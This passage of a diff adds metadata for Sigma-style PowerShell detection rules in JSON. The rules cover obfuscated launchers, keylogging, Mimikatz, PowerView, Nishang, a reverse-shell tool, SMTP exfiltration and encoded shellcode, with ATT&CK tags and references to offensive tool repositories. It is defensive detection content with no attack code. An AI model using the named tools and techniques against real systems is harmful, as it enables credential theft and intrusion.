"logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "value": "Invoke-Obfuscation Via Stdin - Powershell" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "value": "Invoke-Obfuscation Via Use Clip - Powershell" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_keylogging.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" + ], + "tags": [ + "attack.collection", + "attack.t1056.001" + ] + }, + "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "value": "Powershell Keylogging" + }, + { + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_localuser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "value": "Powershell LocalAccount Manipulation" + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "value": "Suspicious PowerShell Mailbox Export to Share - PS" + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "value": "Malicious PowerShell Commandlets" + }, + { + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "value": "Malicious PowerShell Keywords" + }, + { + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/21", + "falsepositive": [ + "Diagnostics" + ], + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "cd185561-4760-45d6-a63e-a51325112cae", + "value": "Live Memory Dump Using Powershell" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "posh_ps_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ] + }, + "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "value": "Modify Group Policy Settings - ScriptBlockLogging" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113, MatilJ", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_msxml_com.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "78aa1347-1517-4454-9982-b338d6df8343", + "value": "Powershell MsXml COM Object" + }, + { + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "meta": { + "author": "Alec Costello", + "creation_date": "2019/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_nishang_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/samratashok/nishang", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "value": "Malicious Nishang PowerShell Commandlets" + }, + { + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "meta": { + "author": "Sami Ruohonen", + "creation_date": "2018/07/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_ntfs_ads_access.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", + "value": "NTFS Alternate Data Stream" + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_office_comobject_registerxll.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ] + }, + "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "value": "Code Executed Via Office Add-in XLL File" + }, + { + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Mimikatz can be useful for testing the security of networks" + ], + "filename": "posh_ps_potential_invoke_mimikatz.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", + "value": "Potential Invoke-Mimikatz PowerShell Script" + }, + { + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/18", + "falsepositive": [ + "Should not be any as administrators do not use this tool" + ], + "filename": "posh_ps_powerview_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "value": "Malicious PowerView PowerShell Commandlets" + }, + { + "description": "Detects PowerShell calling a credential prompt", + "meta": { + "author": "John Lambert (idea), Florian Roth (rule)", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_prompt_credentials.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "value": "PowerShell Credential Prompt" + }, + { + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "posh_ps_psasyncshell.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/JoelGMSec/PSAsyncShell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", + "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" + }, + { + "description": "Detects the use of PSAttack PowerShell hack tool", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_psattack.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "value": "PowerShell PSAttack" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_remote_session_creation.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "value": "PowerShell Remote Session Creation" + }, + { + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_remove_item_path.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "value": "Use Remove-Item to Delete File" + }, + { + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_request_kerberos_ticket.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", + "value": "Request A Single Ticket via PowerShell" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/10", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "filename": "posh_ps_root_certificate_installed.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "42821614-9264-4761-acfc-5772c3286f76", + "value": "Root Certificate Installed - PowerShell" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_run_from_mount_diskimage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", + "value": "Suspicious Invoke-Item From Mount-DiskImage" + }, + { + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_security_software_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", + "value": "Security Software Discovery by Powershell" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/26", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_send_mailmessage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "value": "Powershell Exfiltration Over SMTP" + }, + { + "description": "Detect adversaries enumerate sensitive files", + "meta": { + "author": "frack113", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_sensitive_file_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1570814999370801158", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", + "value": "Powershell Sensitive File Discovery" + }, + { + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/10/20", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_ps_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "value": "Change PowerShell Policies to an Insecure Level - PowerShell" + }, + { + "description": "Detects Base64 encoded Shellcode", + "meta": { + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "creation_date": "2018/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellcode_b64.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + 